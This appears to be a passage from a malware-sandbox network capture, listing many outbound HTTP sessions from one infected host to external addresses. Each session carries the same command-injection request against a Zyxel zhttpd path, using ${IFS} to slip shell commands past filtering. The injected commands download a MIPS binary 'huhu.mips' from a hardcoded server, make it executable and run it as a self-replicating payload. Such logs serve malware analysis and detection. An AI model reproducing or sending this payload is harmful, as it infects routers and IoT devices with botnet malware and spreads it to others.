                                                Jan 29, 2024 07:07:40.150724888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2332192.168.2.2347850161.139.44.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150769949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2333192.168.2.2344316197.6.31.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150808096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2334192.168.2.2355084204.46.123.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150846004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2335192.168.2.2360240181.14.43.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150903940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2336192.168.2.2333436170.137.5.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150926113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2337192.168.2.2333378120.231.250.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150984049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2338192.168.2.2340184195.100.226.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151015997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2339192.168.2.2348826171.100.119.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151053905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2340192.168.2.2335232102.123.174.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151063919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2341192.168.2.2349574186.135.173.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151113987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2342192.168.2.2351578122.182.159.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151144028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2343192.168.2.234379047.171.13.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151190042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2344192.168.2.2339682131.108.147.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151247025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2345192.168.2.2351138145.11.21.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151293993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2346192.168.2.2344882131.14.164.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151345015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2347192.168.2.2360554108.5.181.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151398897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2348192.168.2.235989237.91.34.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151439905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2349192.168.2.2343470198.95.174.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151468039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2350192.168.2.2338268155.253.161.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151494980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2351192.168.2.233646032.238.62.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151542902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2352192.168.2.2342858173.47.66.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151588917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2353192.168.2.2353918194.14.137.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151657104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2354192.168.2.2359258180.127.213.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151690006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2355192.168.2.234200666.62.251.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151741028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2356192.168.2.234022849.115.107.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151763916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2357192.168.2.23339589.189.116.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151777983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2358192.168.2.235534246.101.64.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151832104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2359192.168.2.2350980145.169.109.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151889086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2360192.168.2.2332856183.73.195.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151918888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2361192.168.2.2336234152.159.220.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.151954889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2362192.168.2.2359228115.209.16.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152008057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2363192.168.2.234181482.52.112.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152055025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2364192.168.2.234814427.50.88.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152070999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2365192.168.2.2354668117.23.86.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152123928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2366192.168.2.2356172111.120.75.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152153015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2367192.168.2.2356150129.134.174.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152206898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2368192.168.2.2343794166.153.122.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152241945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2369192.168.2.2357834191.88.30.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152271032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2370192.168.2.233598469.137.132.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152302027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2371192.168.2.2334920184.96.70.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152328014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2372192.168.2.234280613.81.187.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152369022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2373192.168.2.234381257.139.201.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152414083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2374192.168.2.2360698169.14.148.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152462006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2375192.168.2.233886665.200.140.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152496099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2376192.168.2.235658820.197.64.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152529001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2377192.168.2.2356618169.6.146.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152571917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2378192.168.2.234782261.42.239.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152590990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2379192.168.2.2351358150.209.102.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152648926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2380192.168.2.2360552184.244.114.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152683020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2381192.168.2.235743627.42.81.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152714014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2382192.168.2.233717051.26.43.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152775049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2383192.168.2.234603075.110.30.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152813911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2384192.168.2.2346316129.180.159.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152863979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2385192.168.2.2354028125.192.117.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152879000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2386192.168.2.234491639.131.232.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152916908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2387192.168.2.2346376208.80.188.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.152976990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2388192.168.2.2349132188.189.198.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153003931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2389192.168.2.234674813.114.40.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153032064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2390192.168.2.2333960157.89.118.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153068066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2391192.168.2.2355470115.204.132.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153106928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2392192.168.2.2357266184.88.235.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153141975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2393192.168.2.2356370180.150.228.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153172016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2394192.168.2.2340040108.224.240.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153212070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2395192.168.2.2339796118.184.61.38443
                                                TimestampBytes transferredDirectionData
